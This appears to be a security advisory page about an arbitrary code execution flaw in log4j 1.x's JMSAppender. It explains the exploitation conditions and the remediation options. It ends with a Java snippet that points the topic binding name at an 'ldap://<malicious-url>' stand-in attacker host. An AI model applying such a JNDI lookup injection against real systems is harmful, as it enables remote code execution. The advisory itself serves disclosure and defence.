Arbitrary Code Execution Affecting log4j:log4j Open this link in a new tab package, versions [0,]

  • Exploit Maturity

    Proof of concept

  • Attack Complexity


  • Privileges Required


  • Confidentiality


  • Integrity


  • Availability


Do your applications use this vulnerable package?

In a few clicks we can analyze your entire application and see what components are vulnerable in your application, and suggest you quick fixes.

Test your applications
  • snyk-id


  • published

    13 Dec 2021

  • disclosed

    10 Dec 2021

  • credit


How to fix?

There is no fixed version for log4j:log4j.

log4j 1.x is End-of-Life, and a fixed version will not be released. If you believe your application meets the conditions mentioned in the advisory, consider upgrading to the latest log4j 2.x version, or block user input from reaching JMSAppender configurations.


log4j:log4j is a 1.x branch of the Apache Log4j project.

Affected versions of this package are vulnerable to Arbitrary Code Execution.
Note: Even though this vulnerability appears to be related to the log4j 2.x vulnerability, the 1.x branch of the module requires an attacker to have access to modify configurations to be exploitable, which is rarely possible.

In order to leverage this vulnerability the following conditions must be met:

  1. The application has enabled JMSAppender (or a class that extends JMSAppender)
  2. The attacker has access to directly modify the TopicBindingName or TopicConnectionFactoryBindingName configuration variables - which is an unlikely scenario

If these conditions are met, log4j 1.x allows a lookup feature that does not protect against attacker-controlled LDAP and other JNDI related endpoints. Therefore, an attacker with access to the aforementioned configuration variables is able to execute arbitrary code when loaded from an LDAP server.


// ...
JMSAppender a = new JMSAppender();
// OR a.setTopicBindingName("ldap://<malicious-url>");